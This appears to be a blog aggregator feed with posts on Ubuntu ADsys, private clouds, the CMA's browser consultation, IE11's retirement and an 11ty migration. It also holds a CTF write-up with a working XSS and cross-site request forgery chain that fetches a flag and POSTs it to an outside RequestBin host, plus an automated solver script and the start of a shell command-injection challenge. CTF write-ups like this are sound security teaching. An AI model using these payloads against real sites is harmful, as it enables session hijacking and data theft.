June 17, 2022

Linux Active Directory (AD) integration is historically one of the most requested functionalities by our corporate users, and with Ubuntu Desktop 22.04, we introduced ADsys, our new Active Directory client. This blog post is part 3 of a series where we will explore the new functionalities in more detail. (Part 1  – Introduction, Part 2 – Group Policy Objects)

The latest Verizon Data Breach Investigations Report highlighted that leaked credentials and phishing combined account for over 70% of cyberattacks. User management therefore plays a critical role in reducing your organisation’s attack surface. In this article we will focus on how Active Directory can be used to control and limit the privileges your users have on their Ubuntu machines.

While there are significant differences between how Windows and Linux systems perform user management, with ADsys we tried to keep the IT administrators’ user experience as similar as possible to the one currently available for Windows machines.

User management on Linux

Before discussing the new ADsys features it is important to understand the types of users available in Ubuntu and how privileges are managed in the operating system.

There are three types of users in Ubuntu:

  • SuperUser or Root User: the administrator of the Linux system, with elevated rights. The root user doesn’t need permission to run any command. In Ubuntu the root account exists but is disabled by default.
  • System User: a user created by installed software or applications. For example, when we install a service such as Apache Kafka, it creates a dedicated service account to perform application-specific tasks.
  • Normal User: an account used by a person, with a limited set of permissions.

Normal users can use sudo to run programs with the administrative privileges that are normally reserved for the root user.
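
As an illustration, on a stock Ubuntu install this right comes from membership of the sudo group (a minimal sketch; the paths and group names assume default Ubuntu):

# The stock sudoers rule granting the sudo group full rights:
grep '^%sudo' /etc/sudoers
# %sudo   ALL=(ALL:ALL) ALL

# List the current members of the sudo group:
getent group sudo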

In order to strike the right balance between developer productivity and security, it is important for IT administrators to have a centrally defined set of users who are able to execute privileged commands on a machine. A crucial step for this, and the primary driver behind the new feature, was the ability to remove local administrators and grant administrative rights based on Active Directory group membership.

Managing Ubuntu users with Active Directory

Active Directory Admin Center

As discussed in part 2 of this blog series, you need to import into Active Directory the administrative templates generated by the ADSys command line or available in the project’s GitHub repository. Once done, the privilege management settings are globally enforced machine policies, available under Computer Configuration > Policies > Administrative Templates > Ubuntu > Client management > Privilege Authorization in your Active Directory Admin Center.

By default, members of the local sudo group are administrators on the machine. If the Local Users setting is set to Disabled, sudo group members are no longer considered administrators on the client. This means that only valid Active Directory users are able to log in to the machine.

Similarly, it is possible to grant administrator privileges to specific Active Directory users, groups, or a combination of both. Using groups is essential to securely manage administrators across machines, as privileged access reviews are reduced to reviewing membership of one or a few Active Directory groups.
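
On the client side, ADSys ships the adsysctl tool, which you can use to check what was enforced (a sketch; exact flags and output may vary between ADSys versions):

# Refresh policies from Active Directory:
sudo adsysctl update

# Show the policies currently applied to this machine and user:
adsysctl policy applied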

Additional resources and how to get the new features

ADSys is available for free to all Ubuntu users; however, you need an Ubuntu Advantage subscription to take advantage of the privilege management and remote script execution features. You can get a personal licence free of charge using your Ubuntu SSO account. ADSys is supported on Ubuntu starting from 20.04.2 LTS, and tested with Windows Server 2019.

We have recently updated the Active Directory integration whitepaper to include a practical step-by-step guide to help you take full advantage of the new features. If you want to know more about the inner workings of ADSys you can head to its GitHub page or read the product documentation.

If you want to learn more about Ubuntu Desktop, Ubuntu Advantage or our advanced Active Directory integration features please do not hesitate to contact us to discuss your needs with one of our advisors.

on June 17, 2022 07:43 PM

Even after the public cloud hype, private clouds remain an essential part of many enterprises’ cloud strategies. Private clouds simply give CIOs more control over their budgets, enable better security and allow the flexibility to build best-of-breed IT solutions. So let’s stop here and take a step back: why are organisations investing in their IT at all?

Why are private clouds complicated?

IT is an investment, like any other investment an organisation makes. Think of it financially: nobody decides to invest because they think it will be cool! There is a financial return at the end of any road that makes the story reasonable. This might be:

  • Cutting down current costs, saving money.
  • Securing data and applications, building reputation and saving money.
  • Improving productivity, helping organisations make more money.
  • Better serving their customers, making more money.
  • Enabling the launch of a new product or service, making more money.
  • Cutting down the time-to-market, making more money faster.

It usually falls under one of these areas or their derivatives, and it’s all about the ROI. The promise of cloud transformation was to contribute to most of these areas, if not all, simply by cutting down infrastructure and operational costs and providing a rapid time-to-market for organisations to get their workloads live.

However, this was not the case for many who pursued the cloud, whether private or public. Running your IT in the long term and at scale is expensive on the public cloud. Yet the day-2 operations of a private cloud create unavoidable friction. On top of this, there are many approaches to building and setting up your cloud. Should it be a bare-metal cloud, a Kubernetes cloud or a virtualised one? Should you run it in the public cloud, on premises or in a co-located facility? Which technologies or vendor products should you use in every layer of your stack? There are endless possibilities for how you can create a best-of-breed cloud. So, how can we build a successful cloud transformation strategy?

How has the public cloud changed the game? 

As the public cloud emerged, organisations started migrating their workloads to it to reduce their TCO. Public cloud service providers created an alternative pathway for organisations to offload the hassle of managing the underlying infrastructure, allowing them to focus more on their applications. Thanks to its simplicity, fractional consumption and pay-as-you-consume pricing model, the public cloud also enabled the birth of many startups and small businesses and allowed them to compete with larger organisations. It created space for innovation with minimal constraints. Before the public cloud, a business would have to build a data centre to host its services, costing hundreds of thousands of dollars just for IT. That was a massive overhead and a high risk for many in their very early stages. With the development of the public cloud, many startups were empowered to compete with global enterprises, disrupting many industries and impacting our everyday lives. So let’s take a closer look at what public cloud providers offer compared to private clouds.

[Table: IaaS vs PaaS vs SaaS — which layers the customer manages versus the cloud provider]

In an on-premises environment, the organisation is responsible for the whole stack, from networking, storage and servers all the way up to the application layer. In the public cloud, if your organisation uses IaaS, you take care of the OS and above; all the underlying infrastructure is a set of dependencies that the cloud provider manages for you. If you’re using a PaaS, the provider also takes care of the OS, middleware and runtime of your environment. With SaaS, you’re basically an end user of an application where the cloud provider manages everything for you.

This is something you probably already know, but I want to dig deeper into what falls under whose responsibility. Even in the case where your organisation has the most control over the cloud, virtualisation, servers, storage and networking are still managed by your cloud provider. This tells us that infrastructure has been commoditised by hyperscalers, and managing it does not provide your business with a unique competitive edge. Offloading these services will help you focus more on your strategic layers and become more innovative.

Moving towards a data centre as a service

The rule of thumb is: today’s technology becomes tomorrow’s commodity. Accordingly, the less unique your building blocks are, the easier it is to operate and evolve them in the future. Take PCs, for example: there is nothing unique about them today. Any piece of hardware will have an OS layer on top that dictates how the hardware should function, and anyone with basic computer skills should be able to use it. Data centres should be designed in exactly the same way; in fact, this is how they have evolved over time. In the last several years, we can see how most data centre and cloud solution vendors are commoditising their hardware and focusing on software to create the layer of intelligence that differentiates their solutions.

In short, managing the dependencies of your business applications does not add value to your organisation, nor does it enrich your competitive edge in the market. However, digitising your operations, enabling remote work or focusing heavily on R&D can contribute to your competitive advantage. Frankly, 96% of executives are unhappy with innovation, according to a recent McKinsey report. The findings are not surprising given that most IT specialists are focused on keeping the lights on. This has become one of the main reasons many organisations are moving towards managed private clouds: they want to cut operational costs and gain more control over their budgets so they can shift focus towards innovation. Keeping in mind that the ultimate goal of open source is to enable flexibility and agility and cut down costs, avoiding its complexity is a huge gain for the organisation.

Thinking about simplifying your operations? 

Download the guide “Managed IT Services: Overcoming CIOs biggest challenges”
Read the “Private cloud vs managed cloud: cost analysis” whitepaper
Visit our managed services website to learn more

on June 17, 2022 01:47 PM

Help the CMA help the Web

Stuart Langridge

As has been mentioned here before, the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell them whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

on June 17, 2022 10:33 AM

June 15, 2022

Dev Ops job?

Bryan Quigley

Dev Ops Job?

Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

on June 15, 2022 04:00 PM

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8, and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9-year-old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90-day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigorously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

on June 15, 2022 12:00 AM

June 14, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 739 for the week of June 5 – 11, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on June 14, 2022 12:02 AM

June 12, 2022

This site is now powered by a static site generator called 11ty. It’s awesome! I’ll try to explain some of my favourite things about it and reasons you might prefer it to stalwarts in the SSG arena.

Volume knob that goes to 11

15 years ago, training up on Django, I built a blog. It’s what webdevs did back then. It was much faster than Wordpress but the editing always fell short and the database design got in the way more than it helped. Dogfooding your software means every problem is yours. I had a glossy coat but the jelly and chunks arrested my writing process.

SSGs are perfect for blogs and brochure websites

Static site generators churn content through templates into a static website that you can just upload to a simple webserver. This is unlike Django or any other dynamic language, where you host a running process and database on an expensive server 24/7 to generate HTML on demand. You’re just serving files, for free.

Most sites don’t need fresh HTML for every request. They don’t change often enough. A blog or a business’ brochure website might get updates anywhere from a couple of times a day to only once or twice a year. With a static site generator, you can make your edits and regenerate the site.
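
For example, with 11ty (assuming an npm project with @11ty/eleventy installed) the edit-and-regenerate loop is just:

# Rebuild the whole site into the output directory:
npx @11ty/eleventy

# Or rebuild on every change and preview locally:
npx @11ty/eleventy --serve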

It’s also secure. There’s nothing to hack running on my domain like there might be in a Wordpress install. There’s no database to run injection attacks against. There’s no indication where the source is hosted. For me, Cloudflare assumes much of the liability there.

I’ve used a few SSGs professionally: Jekyll, Hugo and Nuxt.

Why pick 11ty over those?

11ty logo

Jekyll is glacial on Cloudflare’s CI/CD environment: about 3 minutes a build. Hugo is fast but can be a nightmare to work with when things go wrong. Absolutely user error, but I’ve wasted days at a time banging my head on Hugo. Jekyll and Hugo, being non-JS options, each have their own take on asset management. I’m also a Vue developer, so Nuxt is great for me, but force-feeding users a bundle of Vue, Nuxt, routers and whatnot, just for a blog? It’s silly. It does have top-shelf asset management though.

11ty was a perfect balance between Hugo and Nuxt. I get all my favourite frontend tools (PostCSS, PurgeCSS on here) with a generator that isn’t trying to force-feed my users a massive script bundle.

More, I get to pick the markup language I write in. I can use Markdown, Liquid, Handlebars, Nunjucks, Moustache, and many, many more. Even plain old HTML, or a mix. I can bundle images with the blog posts (like Hugo leaf bundles). I can paint extra styles on the page if I want to.

I have freedom. I can do anything, on any page.

It’s been 3 weeks, 2 days since my initial commit on this site’s repo and since finishing the conversion I’ve written more posts than I did in the previous decade, and I’ve also converted two Jekyll sites over too. Each took about an afternoon. Perfect URL parity, nothing ostensibly different, just a [much] better toolchain.

What took longest was editing and upgrading 285 blog posts, spanning back to the early Noughties.

Fast Enough™ for developers

Build performance only matters to a point. On this seven-year-old laptop, 11ty generates this whole blog, 400 pages, in well under two seconds:

Copied 403 files / Wrote 539 files in 1.46 seconds (2.7ms each, v1.0.1)

It’s a second faster on my desktop, and on a real 23 page brochure website, it’s only 0.3s.

11ty is fast but whatever I use only has to be faster than me switching to my browser. Hugo is insanely fast but so what? Anything less than 2 seconds is Fast Enough™. That’s what I mean.

No added bloat for visitors

Many JavaScript-based SSGs bundle in client code too. Sometimes this makes sense: you might use Next or Nuxt to build component-rich SPAs, but for blogging and brochure stuff, an extraneous 100KB of swarf delivers a poor user experience.

This may explain why I’ve actively sought out non-JS SSGs like Jekyll and Hugo before.

11ty is one of the few JS SSGs that doesn’t force script on your users. If you want “pure” HTML, that’s what you’ll get. If you’re economic with your CSS, images and fonts, it’s easy to juice the performance stats.

100% on Pagespeed

Comes with batteries…

You don’t have to pick between Markdown and Pug, Liquid or Nunjucks. You get them all, and more. Frontmatter can be in YAML, TOML, HAML, JSON, even build-time JavaScript. So what? So what?! You wouldn’t say that if you’d ever wasted a day trying to work out what the hell a Hugo site was doing because of a typo in a template whose syntax was so thick and unwelcoming, kings built castle walls with it.

11ty is simple and flexible.

There’s also a huge pile of community 11ty plugins too.

… But you can use your own

If you don’t get on with something in 11ty, you can use something else, or rip it out and do your own thing.

The Eureka moment for me was when I got into a fight with the markdown engine. I wanted to extend it to handle some of the custom things I did in my old blog posts, that I’d implemented in Django. Code to generate Youtube embeds, special floats, <aside> sidebars, etc. It would have been a nightmare to upgrade every post.

Using markdown-it and markdown-it-container I completely replaced the Markdown engine with something I could hack on. The “explainer” container wiring looks roughly like the snippet below (a minimal reconstruction of the idea, not the exact original):
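
// .eleventy.js — replace the bundled Markdown engine with a hackable one
const markdownIt = require("markdown-it");
const markdownItContainer = require("markdown-it-container");

module.exports = function (eleventyConfig) {
  const md = markdownIt({ html: true })
    // Render `::: explainer … :::` blocks as <aside> sidebars
    .use(markdownItContainer, "explainer", {
      render: (tokens, idx) =>
        tokens[idx].nesting === 1 ? '<aside class="explainer">\n' : "</aside>\n",
    });
  eleventyConfig.setLibrary("md", md);
};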

It’s important to stress that neither of those projects are for 11ty. They’re just two of a million projects sitting on npm for anyone to use. 11ty just makes it easy to use any of this stuff on your pages.

Adding template-filters for all the bundled template languages is also made really simple:

eleventyConfig.addFilter("striptags", v => v.replace(/(<([^>]+)>)/gi, ""))
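
With that registered, the filter is available in all the bundled template languages, for example {{ post.templateContent | striptags }} in Nunjucks.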

If you’ve ever used opinionated software before —perhaps even your own— you’ll appreciate that 11ty isn’t just getting out of your way, it’s going out of its way to make your life easy.

What’s not so good?

I’m three sites into 11ty now, I’ve seen how I work with it and I’ve bumped into a few things I’m not gushing about:

  • Pagination is good and frustrating in equal measure. Collections seem like a good idea, filtering them into new collections is easy enough, but actually paginating them can be a bit of a mess. To show a tag page, for example, you actually use pagination to filter the collection to that tag. But then you can’t [easily] re-paginate that data, so I just show all posts from that tag rather than 15.

    If I had hundreds of posts in any one tag, this’d be a problem.

  • For all my complaints with Jekyll and Hugo’s wonky asset pipelines, 11ty’s is completely decoupled.

    I use eleventy-plugin-postcss to call PostCSS at roughly the right time (and update on changes) but I could just as easily handle that externally. There’s nothing in 11ty (obvious to me anyway) to ingest that back into the templates.

    • You can’t easily inline classes that only get used on one page.
    • You can’t easily hash the filenames and update the links that call them after generating the post HTML (that’s important with PurgeCSS).
    • Media handling could be tighter. The Image plugin is official, but this should be part of the project IMO, and not rely on this hairy shortcode.

    It’s important to stress that I’m using 11ty in order that I don’t need bundles, but some of these complaints would be assuaged if the system could parse bundle manifests, so I could use external tools rather than just dumb static assets and have the right filenames pulled in (at the right time).

  • A scoped include like Django’s would solve a couple of problems I’ve hacked around:

    {% include 'template' with variable=value %}

    Saneef points out that this is possible by leveraging the macro functions in Nunjucks (see the sketch after this list). It’s a bit of a mouthful. I’d prefer a first-party solution (which I guess would actually have to come as part of Nunjucks), but again it’s interesting to see just how flexible this thing is.

  • Named/keyword arguments in shortcodes would also be nice, so I don’t have to provide every option just to use the last one, but I guess this would require some thinking around the lack of named parameters in JavaScript.
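
For reference, the Nunjucks macro workaround from the earlier point looks roughly like this (a sketch with hypothetical template and variable names):

{# _includes/macros.njk #}
{% macro card(title, body) %}
<div class="card">
  <h2>{{ title }}</h2>
  <p>{{ body }}</p>
</div>
{% endmacro %}

{# in a page — a scoped “include with arguments”: #}
{% import "macros.njk" as ui %}
{{ ui.card("Hello", "variables stay scoped to the macro") }}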

These are small complaints, maybe already with solutions I’ve just not seen yet.

I’ve still managed to transfer three sites to 11ty in a couple of weeks and I wouldn’t have done that if I didn’t think it worked well enough. I’m really happy with 11ty. I’d heartily recommend it to anyone.

on June 12, 2022 12:00 AM

June 09, 2022

This year, I was the author of a few of our web challenges. One of those that gave both us (as administrators) and the players a few difficulties was “TODO List”.

Upon visiting the application, we see an app with a few options, including registering, login, and support. Upon registering, we are presented with an opportunity to add TODOs and mark them as finished:


If we check robots.txt we discover a couple of interesting entries:

User-agent: *
Disallow: /index.py
Disallow: /flag

Visiting /flag, unsurprisingly, shows us an “Access Denied” error and nothing further. It seems that we’ll need to find some way to elevate our privileges or compromise a privileged user.

The other entry, /index.py, provides the source code of the TODO List app. A few interesting routes jump out at us, not least of which is the routing for /flag:

@app.route('/flag', methods=['GET'])
def flag():
    user = User.get_current()
    if not (user and user.is_admin):
        return 'Access Denied', 403
    return flask.send_file(
            'flag.txt', mimetype='text/plain', as_attachment=True)

We see that we will need a user flagged with is_admin. There’s no obvious way to set this value on an account. User IDs as stored in the database are based on a sha256 hash, and the passwords are hashed with argon2. There’s no obvious way to login as an administrator here. There’s an endpoint labeled /api/sso, but it requires an existing session.

Looking at the frontend of the application, we see some pretty simple JavaScript to load TODOs from the API, add them to the UI, and handle marking them as finished on click. Most of it looks pretty reasonable, but there’s a case where the TODO is inserted into an HTML string here:

const rowData = `<td><input type='checkbox'></td><td>${data[k].text}</td>`;
const row = document.createElement('tr');
row.innerHTML = rowData;

This looks awfully like an XSS sink, unless the server is pre-escaping the data for us in the API. Easy enough to test though, we can just add a TODO containing <span onclick='alert(1)'>Foobar</span>. We quickly see the span become part of the DOM and a click on it gets the alert we’re looking for.


At this point, we’re only able to get an XSS on ourselves, otherwise known as a “Self-XSS”. This isn’t very exciting by itself – running a script as ourselves is not crossing any privilege boundaries. Maybe we can find a way to create a TODO for another user?

@app.route('/api/todos', methods=['POST'])
def api_todos_post():
    user = User.get_current()
    if not user:
        return '{}'
    todo = flask.request.form.get("todo")
    if not todo:
        return 'Missing TODO', 400
    num = user.add_todo(todo)
    if num:
        return {'{}'.format(num): todo}
    return 'Too many TODOs', 428

Looking at the code for creating a TODO, it seems quite clear that it depends on the current user. The TODOs are stored in Redis as a single hash object per user, so there’s no apparent way to trick it into storing a TODO for someone else. It is worth noting that there’s no apparent protection against a Cross-Site Request Forgery, but it’s not clear how we could perform such an attack against the administrator.

Maybe it’s time to take a look at the Support site. If we visit it, we see not much at all but a Login page. Clicking on Login redirects us through the /api/sso endpoint we saw before, passing a token in the URL and generating a new session cookie on the support page. Unlike the main TODO app, no source code is to be found here. In fact, the only real functionality is a page to “Message Support”.

Submitting a message to support, we get a link to view our own message. In the page, we have our username, our IP, our User-Agent, and our message. Maybe we can use this for something. Placing an XSS payload in our message doesn’t seem to get anywhere in particular – nothing is firing, at least when we preview it. Obviously an IP address isn’t going to contain a payload either, but we still have the username and the User-Agent. The User-Agent is relatively easily controlled, so we can try something here. cURL is an easy way to give it a try, especially if we use the developer tools to copy our initial request for modification:

curl 'https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryz4kbBFNL12fwuZ57' \
  -H 'cookie: sup_session=75b212f8-c8e6-49c3-a469-cfc369632c72' \
  -H 'origin: https://todolist-support-ebc7039e.challenges.bsidessf.net' \
  -H 'referer: https://todolist-support-ebc7039e.challenges.bsidessf.net/message' \
  -H 'user-agent: <script>alert(1)</script>' \
  --data-raw $'------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="difficulty"\r\n\r\n4\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="message"\r\n\r\nfoobar\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57\r\nContent-Disposition: form-data; name="pow"\r\n\r\n1b4849930f5af9171a90fe689edd6d27\r\n------WebKitFormBoundaryz4kbBFNL12fwuZ57--\r\n'

Viewing this message, we see our good friend, the alert box.

Alert 1

Things are beginning to become a bit clearer now – we’ve discovered a few things.

  1. The flag is likely on the page /flag of the TODO list manager.
  2. Creating a TODO list entry has no protection against XSRF.
  3. Rendering a TODO is vulnerable to a self-XSS.
  4. Messaging the admin via support appears to be vulnerable to XSS in the User-Agent.

Due to the Same-Origin Policy, the XSS on the support site can’t directly read the resources from the main TODO list page, so we need to do a bit more here.

We can chain these together to (hopefully) retrieve the flag as the admin by sending a message to the admin that contains a User-Agent with an XSS payload that does the following steps:

  1. Uses the XSRF to inject a payload (steps 3+) as a new XSS.
  2. Redirects the admin to their TODO list to trigger the XSS payload.
  3. Uses the Fetch API (or XHR) to retrieve the flag from /flag.
  4. Uses the Fetch API (or XHR) to send the flag off to an endpoint we control.

One additional complication is that <script> tags will not be executed if injected via the innerHTML mechanism in the TODO list. The reasons are complicated, but essentially:

  • innerHTML is parsed using the algorithm described in Parsing HTML Fragments of the HTML spec.
  • This creates an HTML parser associated with a new Document node.
  • The script node is parsed by this parser, and then inserted into the DOM of the parent Document.
  • Consequently, the parser document and the element document are different, preventing execution.

We can work around this by using an event handler that will fire asynchronously. My favorite variant of this is doing something like <img src='x' onerror='alert(1)'>.

I began by preparing the payload I wanted to fire on todolist-support as an HTML standalone document. I included a couple of variables for the hostnames involved.

<div id='s2'>
const dest='{{dest}}';
fetch('/flag').then(r => r.text()).then(b => fetch(dest, {method: 'POST', body: b}));
</div>
<script>
const ep='{{ep}}';
const s2=document.getElementById('s2').innerHTML;
const fd=new FormData();
fd.set('todo', '<img src="x" onerror="'+s2+'">');
fetch(ep + '/api/todos',
    {method: 'POST', body: fd, mode: 'no-cors', credentials: 'include'}).then(
        _ => {document.location.href = ep + '/todos'});
</script>

I used the DIV s2 to get the escaping right for the JavaScript I wanted to insert into the error handler for the image. This would be the payload executed on todolist, while the lower script tag would be executed on todolist-support. This wasn’t strictly necessary, but it made experimenting with the 2nd-stage payload easier.

The todolist-support payload triggers a cross-origin request (hence the need for mode: 'no-cors' and credentials: 'include') to the todolist API to create a new TODO. The new TODO contained an image tag with the contents of s2 as the onerror handler (which would fire as soon as it rendered).

That JavaScript first fetched the /flag endpoint, then did a POST to my destination with the contents of the response.

I built a small(ish) python script to send the payload file, and used RequestBin to receive the final flag.

import requests
import argparse
import os

def make_email():
    return os.urandom(12).hex() + '@example.dev'

def register_account(session, server):
    resp = session.post(server + '/register', data={
        'email': make_email(),
        'password': 'foofoo',
        'password2': 'foofoo'})

def get_support(session, server):
    resp = session.get(server + '/support')
    return resp.url

def post_support_message(session, support_url, payload):
    # first sso
    resp = session.get(support_url + '/message')
    msg = "auto-solution-test"
    pow_value = "c8157e80ff474182f6ece337effe4962"
    data = {"message": msg, "pow": pow_value}
    resp = session.post(support_url + '/message', data=data,
            headers={'User-Agent': payload})

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('server', default='http://localhost:3123/',
            nargs='?', help='TODO Server')
    # args.requestbin is used below, so the script needs this argument
    # (reconstructed; the original presumably took the bin URL the same way)
    parser.add_argument('--requestbin', required=True,
            help='URL that will receive the exfiltrated flag')
    args = parser.parse_args()

    server = args.server
    if server.endswith('/'):
        server = server[:-1]
    sess = requests.Session()
    register_account(sess, server)
    support_url = get_support(sess, server)
    if support_url.endswith('/'):
        support_url = support_url[:-1]
    print('Support URL: ', support_url)
    payload = open('payload.html').read().replace('\n', ' ')
    payload = payload.replace('{{dest}}', args.requestbin
            ).replace('{{ep}}', server)
    print('Payload is: ', payload)
    post_support_message(sess, support_url, payload)
    print('Sent support message.')

if __name__ == '__main__':
    main()
The python takes care of registering an account, redirecting to the support site, logging in there, then sending the payload in the User-Agent header. Checking the request bin will (after a handful of seconds) show us the flag.

on June 09, 2022 07:00 AM

June 07, 2022

Hello world!

Salih Emin

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

on June 07, 2022 09:00 AM

As the author of the Cow Say What? challenge from this year’s BSidesSF CTF, I got a lot of questions about it after the CTF ended. It’s both surprisingly straight-forward but also a very little-known issue.

The challenge was a web challenge – if you visited the service, you got a page providing a textarea for input to the cowsay program, as well as a drop down for the style of the cow saying something (plain, stoned, dead, etc.). There was a link to the source code, reproduced here:

package main

import (
	"fmt"
	"html/template"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"regexp"
)

const (
	COWSAY_PATH = "/usr/games/cowsay"
)

var (
	modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")
)

// Note: mode must be validated prior to running this!
func cowsay(mode, message string) (string, error) {
	cowcmd := fmt.Sprintf("%s %s -n", COWSAY_PATH, mode)
	log.Printf("Running cowsay as: %s", cowcmd)
	cmd := exec.Command("/bin/sh", "-c", cowcmd)
	stdin, err := cmd.StdinPipe()
	if err != nil {
		return "", err
	go func() {
		defer stdin.Close()
		io.WriteString(stdin, message)
	outbuf, err := cmd.Output()
	if err != nil {
		return "", err
	return string(outbuf), nil

func checkMode(mode string) error {
	if mode == "" {
		return nil
	}
	if !modeRE.MatchString(mode) {
		return fmt.Errorf("Mode must match regexp: %s", modeRE.String())
	}
	return nil
}

const cowTemplateSource = `
<!doctype html>
	<h1>Cow Say What?</h1>
	<p>I love <a href='https://www.mankier.com/1/cowsay'>cowsay</a> so much that
	I wanted to bring it to the web.  Enjoy!</p>
	{{if .Error}}
	<p><b>{{.Error}}</b></p>
	{{end}}
	<form method="POST" action="/">
	<select name="mode">
		<option value="">Plain</option>
		<option value="-b">Borg</option>
		<option value="-d">Dead</option>
		<option value="-g">Greedy</option>
		<option value="-p">Paranoid</option>
		<option value="-s">Stoned</option>
		<option value="-t">Tired</option>
		<option value="-w">Wired</option>
	</select><br />
	<textarea name="message" placeholder="message" cols="60" rows="10">{{.Message}}</textarea><br />
	<input type='submit' value='Say'><br />
	</form>
	{{if .CowSay}}
	<pre>{{.CowSay}}</pre>
	{{end}}
	<p>Check out <a href='/cowsay.go'>how it works</a>.</p>
`

var cowTemplate = template.Must(template.New("cowsay").Parse(cowTemplateSource))

type tmplVars struct {
	Error   string
	CowSay  string
	Message string
}

func cowsayHandler(w http.ResponseWriter, r *http.Request) {
	vars := tmplVars{}
	if r.Method == http.MethodPost {
		mode := r.FormValue("mode")
		message := r.FormValue("message")
		vars.Message = message
		if err := checkMode(mode); err != nil {
			vars.Error = err.Error()
		} else {
			if said, err := cowsay(mode, message); err != nil {
				log.Printf("Error running cowsay: %v", err)
				vars.Error = "An error occurred running cowsay."
			} else {
				vars.CowSay = said
			}
		}
	}
	cowTemplate.Execute(w, vars)
}

func sourceHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "cowsay.go")
}

func main() {
	addr := ""
	if len(os.Args) > 1 {
		addr = os.Args[1]
	}
	http.HandleFunc("/cowsay.go", sourceHandler)
	http.HandleFunc("/", cowsayHandler)
	log.Fatal(http.ListenAndServe(addr, nil))
}

There are a few things to unpack here, but probably the most significant is that the cowsay output is produced by invoking an external program. Notably, it passes the message via stdin, and the mode as an argument to the program. The entire program is invoked via sh -c, which makes this similar to the system(3) libc function.

The mode is validated via a regular expression. As Jamie Zawinski once opined (and Jeff Atwood has commented on):

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

Well, it turns out we do have two problems. Our regular expression is given by the statement:

modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")

